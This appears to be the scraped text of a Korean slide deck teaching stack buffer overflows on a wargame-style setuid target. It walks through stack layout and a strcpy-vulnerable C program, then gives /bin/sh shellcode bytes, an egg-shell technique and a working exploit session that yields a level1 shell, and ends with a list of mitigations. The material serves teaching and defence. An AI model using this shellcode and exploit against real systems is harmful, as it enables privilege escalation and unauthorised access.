Download presentation
Presentation is loading. Please wait.
1
Basic of Buffer Over Flow
S.S.G 방승원
2
Agenda Introduction Memory Structure Stack Structure while Example
Target Program Ready & Attack Attack & Security Application of Overflow
3
Introduction Overflow ?? Buffer Over Flow ?? 넘치다, 넘쳐 흐르다;범람하다;
<용기 등이> 가득 차다, 넘치다 Buffer Over Flow ?? 정해진 메모리보다 많은 데이터를 입력 받아 특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격 <Phrack Magazine 49-14>, Aleph One
4
Memory Structure TEXT : TEXT Program Code DATA : Static Variable
LOW TEXT TEXT : Program Code DATA : Static Variable Global Variable HEAP : Dynamic Allocation STACK Dynamic Varbiable Local Variable DATA HEAP STACK HIGH
5
Stack Structure LIFO(Last In First Out) PUSH POP STACK
Memory LOW (0x ) Stack HIGH STACK LIFO(Last In First Out) PUSH POP SP(Stack Pointer) BP(Base Pointer) PUSH POP C B Memory HIGH (0xbfffffff) A Stack LOW SP BP
6
Example Program #include <stdio.h>
void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”);
7
Example Program STACK #include <stdio.h>
Memory LOW (0x ) Stack HIGH STACK buf2 #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”); buf1 Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW ESP EBP
8
Example Program STACK main: pushl $3 pushl $2 pushl $1 call func
ESP Memory LOW (0x ) Stack HIGH STACK buf2 main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret buf1 Dummy EBP Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW
9
Target Program #include <stdio.h> #include <string.h>
void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); argc, argv 프로그램을 실행 할 때 인자를 입력받는 방법 ex) ./target bang 1234 argv = 3; argv[0] = “target”; argv[1] = “bang”; argv[2] = “1234”; strcpy(dest, src) src가 가르키는 문자열을 dest로 복사 * 크기 제한이 없어 overflow 취약점 발생
10
Target Program Setuid Bit 가 걸려있음 Set User ID Bit(number – 4000)
$ chmod 4755 target (or chmod u+s) -rwsr-xr-x 1 level1 level1 target 어떤 사용자든지 이 target을 실행할 땐 level1 유저권한을 갖게 됨 ex) passwd Redhat 9.0, Kernel , gcc
11
Target Program Let’s Run program With a lot of ‘A’ Character!!!
Result : Segmentation Fault Why??
12
Target Program ESP Memory LOW (0x ) Stack HIGH STACK buf #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); Dummy EBP SFP RET Memory HIGH (0xbfffffff) str = argv[1] Stack LOW
13
Target Program STACK $ ./target `perl -e 'print "A"x71'` Normal Memory
HIGH Memory LOW $ ./target `perl -e 'print "A"x71'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Normal
14
Target Program STACK $ ./target `perl -e 'print "A"x72'` Overflow
Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x72'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Overflow
15
Target Program STACK $ ./target `perl -e 'print "A"x80'` Real Overflow
Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x80'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ] Stack LOW Stack HIGH Real Overflow
16
Target Program STACK Memory LOW Stack HIGH A Dummy SFP [ BFFFFFBF ]
SP Memory LOW (0x ) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A Dummy E BP SFP [ BFFFFFBF ] RET [ BBFFFF08 ] Memory HIGH (0xbfffffff) str Stack LOW
17
Target Program STACK Memory LOW Stack HIGH A Dummy [ AAAA ]
SP Memory LOW (0x ) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A 0x (??) Dummy [ AAAA ] E BP SFP [ AAAA ] RET [ AAAA ] Memory HIGH (0xbfffffff) str Stack LOW
18
Shell Code 쉘을 실행해주는 코드 #include <unistd.h> void main() {
char *shell[2]; setreuid(3001, 3001); shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } 어셈코드 "\x31\xc0\x31\xdb\x31\xc9\x66\xbb” “\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46” “\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88” ”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3” ”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31” ”\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
19
Attack Ready Segmentation Fault 확인 쉘코드 제작
쉘코드를 버퍼에다 넣었을 때, 그 버퍼의 주소를 찾아야 됨 But, 버퍼의 주소를 추측하기가 어려움 그러므로 쉘 환경 변수에 쉘코드를 넣어서 사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용
20
Attack bash-2.05b$ ./egg 512 200 Using address: 0xbffffa60
bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")` sh-2.05b$ id uid=3001(level1) gid=1000(guest) groups=1000(guest) sh-2.05b$
21
Attack V.S Security Non-executable Stack Return Into Libc
Omega Project Stack Guard and Stack Shield Bypass Stack Guard and Stack Shield Random Stacks Exec Shield(커널수준) Exec Shield 회피 strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat() 사용 And so on………
22
Application of Overflow
Windows, Unix, Linux, Mac Local, Remote Web -> ActiveX Heap Overflow Integer Overflow Frame Pointer Overwrite
Similar presentations